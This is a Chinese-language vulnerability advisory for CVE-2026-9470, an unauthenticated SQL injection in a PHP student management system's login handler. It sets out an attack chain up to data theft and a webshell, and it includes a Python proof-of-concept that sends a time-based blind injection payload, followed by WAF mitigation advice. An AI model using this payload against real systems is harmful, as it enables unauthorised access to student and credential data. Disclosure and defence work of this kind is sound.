CVE-2026-9470 CVSS 7.3 高危

CVE-2026-9470 StudentManagementSystem SQL注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9470

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

yashpokharna2555 StudentManagementSystem

漏洞概述

yashpokharna2555开发的StudentManagementSystem项目中存在严重安全漏洞。该漏洞位于student_trans.php文件的confirm_logged_in函数内，由于未对FIRST_NAME、Last_Name及EMAIL参数进行有效过滤，导致攻击者可远程发起SQL注入攻击。目前漏洞利用细节已公开，官方暂未回应。

技术细节

该漏洞属于典型的SQL注入漏洞，源于不安全的数据库查询设计。在StudentManagementSystem的student_trans.php文件中，confirm_logged_in函数处理用户登录逻辑时，直接将用户传入的FIRST_NAME、Last_Name和EMAIL参数拼接到SQL语句中执行，未使用预编译语句或进行充分的输入验证。攻击者无需经过身份认证，即可构造恶意SQL载荷通过HTTP请求发送至服务器。利用此漏洞，攻击者可以操纵数据库查询逻辑，从而绕过认证、窃取包含敏感信息（如用户凭证、学生数据）的数据库内容，甚至在特定条件下修改或删除数据，对系统的机密性、完整性和可用性造成威胁。

攻击链分析

STEP 1

1. 信息侦察

攻击者使用扫描工具或人工分析，确认目标站点使用了yashpokharna2555的StudentManagementSystem，并定位到存在漏洞的student_trans.php文件。

STEP 2

2. 构造攻击载荷

攻击者利用SQL注入语法（如UNION SELECT或基于时间的盲注语句），针对FIRST_NAME、Last_Name或EMAIL参数构造恶意HTTP POST数据包。

STEP 3

3. 执行注入攻击

攻击者向服务器发送恶意请求，后端数据库接收并执行了拼接后的SQL语句，导致数据库返回敏感信息或产生响应延迟。

STEP 4

4. 数据窃取或破坏

根据注入结果，攻击者提取数据库中的管理员密码、学生信息等敏感数据，或进一步获取Webshell控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests def check_sql_injection(target_url): # Target endpoint based on vulnerability description endpoint = f"{target_url}/student_trans.php" # Payload for Time-Based Blind SQL Injection # Attempting to delay response by 5 seconds payload = { "FIRST_NAME": "admin' AND (SELECT SLEEP(5))-- -", "Last_Name": "test", "EMAIL": "[email protected]" } try: print(f"[*] Sending payload to {endpoint}...") response = requests.post(endpoint, data=payload, timeout=10) # Check if the response time indicates a successful delay if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! SQL Injection detected.") else: print("[-] Exploit failed or patch applied.") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": target = "http://target-ip" # Replace with actual target check_sql_injection(target)

影响范围

yashpokharna2555 StudentManagementSystem (Commit cb2f558ddf8d19396de0f92abf2d224d46a0a203 及之前版本)

防御指南

临时缓解措施

在官方发布补丁之前，建议在Web应用防火墙（WAF）中部署针对SQL注入的防护规则，拦截包含单引号、注释符（--）、UNION、SELECT等关键字的恶意请求。同时，若非必须，可暂时通过访问控制列表（ACL）限制对student_trans.php的外部访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9470
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9470
3 Details https://www.cvedetails.com/cve/CVE-2026-9470/
4 VulDB https://vuldb.com/cve/CVE-2026-9470
5 Link https://github.com/yashpokharna2555/StudentManagementSystem/
6 Link https://github.com/yashpokharna2555/StudentManagementSystem/issues/3
7 Link https://vuldb.com/submit/814001
8 Link https://vuldb.com/vuln/365451
9 Link https://vuldb.com/vuln/365451/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表